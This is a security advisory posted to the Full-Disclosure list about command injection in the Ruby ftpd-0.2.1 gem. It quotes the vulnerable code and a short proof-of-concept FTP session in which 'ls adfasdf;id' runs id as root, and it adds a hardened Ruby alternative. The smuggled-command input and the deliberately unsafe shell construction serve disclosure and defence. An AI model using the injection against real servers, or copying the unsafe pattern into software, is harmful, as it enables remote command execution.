
[Full-disclosure] Remote command execution for Ruby Gem ftpd-0.2.1



<html><body><div><h2>Remote command execution for Ruby Gem ftpd-0.2.1</h2>
<hr>
<i>2/28/2013</i>
<p><a href="https://github.com/wconrad/ftpd">https://github.com/wconrad/ftpd</a><br>
<a href="http://rubygems.org/gems/ftpd">http://rubygems.org/gems/ftpd</a>
</p>
<p>"ftpd is a pure Ruby FTP server library. It supports implicit and 
explicit TLS, passive and active mode, and most of the commands 
specified in <a href="http://www.cis.ohio-state.edu/rfc/rfc969.txt">RFC 
969</a>. It can be used as part of a test fixture or embedded in a program."
</p>
<p>The ls interface is vulnerable to command injection: if the option or the filename
contains the shell metacharacter ";", whatever follows it is executed as a separate
shell command. The example.rb server, which I used to test the ftp library,
listens on localhost only.
</p>
<p>./ftpd-0.2.1/lib/ftpd/disk_file_system.rb
</p>
<p>For this to work, the file must exist in the CWD.
</p>

<p>ftp&gt; ls adfasdf;id<br>
200 PORT command successful<br>
150 Opening ASCII mode data connection<br>
-rw-r--r-- 1 root root 0 Mar  2 05:52 adfasdf<br>
uid=0(root) gid=0(root) groups=0(root)<br>
226 Transfer complete<br>
ftp&gt; 
</p>
<p>The relevant code from ./ftpd-0.2.1/lib/ftpd/disk_file_system.rb (line numbers
stripped): the client-supplied option and filename are joined into one shell
command line and executed with backticks, so they reach /bin/sh unescaped.
</p>
<pre># Ls interface used by List and NameList

    module Ls

      def ls(ftp_path, option)
        path = expand_ftp_path(ftp_path)
        dirname = File.dirname(path)
        filename = File.basename(path)
        # option and filename come straight from the FTP client
        command = [
          'ls',
          option,
          filename,
          '2&gt;&amp;1',
        ].compact.join(' ')
        if File.exists?(dirname)
          list = Dir.chdir(dirname) do
            `#{command}`   # backticks hand the whole string to /bin/sh
          end
        end
        # (rest of the method and module not included in the original post)
</pre>
<p>This vulnerability has been fixed by the author in the latest release.
</p>
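Added example (not code from the advisory or from the ftpd project) contrasting the vulnerable string construction above with a listing that passes an argv array directly to ls, so no shell ever parses client input; the short-flag whitelist for option and the "--" separator are my assumptions about what such a server needs to accept.

```ruby
require 'open3'

# Vulnerable construction, mirroring the pattern in disk_file_system.rb:
# returns the single string that the backtick operator would hand to /bin/sh.
# With filename "adfasdf;id" the shell runs ls, then runs id.
def vulnerable_ls_command(filename, option = nil)
  ['ls', option, filename, '2>&1'].compact.join(' ')
end

# Hardened listing: an argv array is spawned directly (Open3 -> Process.spawn
# with several arguments), never parsed by a shell, so ';', '|', '$(...)' in
# filename or option are ordinary bytes in a single argument.
# The option is also restricted to short ls flags (assumption: that is all the
# FTP LIST/NLST handler needs), and '--' stops ls from reading a filename that
# begins with '-' as a flag. stderr is merged into stdout like the original's 2>&1.
def safe_ls(dirname, filename, option = nil)
  argv = ['ls']
  if option
    unless option.match?(/\A-[a-zA-Z]+\z/)
      raise ArgumentError, "unsupported ls option: #{option.inspect}"
    end
    argv << option
  end
  argv << '--' << filename
  out, _status = Open3.capture2e(*argv, chdir: dirname)
  out
end
```

For a filename such as "adfasdf;id", safe_ls lists (or reports as missing) a file literally named "adfasdf;id" and never executes id.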
<p>Larry W. Cashdollar<br>
@_larry0<br>
<a href="http://otiose.dhs.org/">http://otiose.dhs.org/</a>
</p></div></body></html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/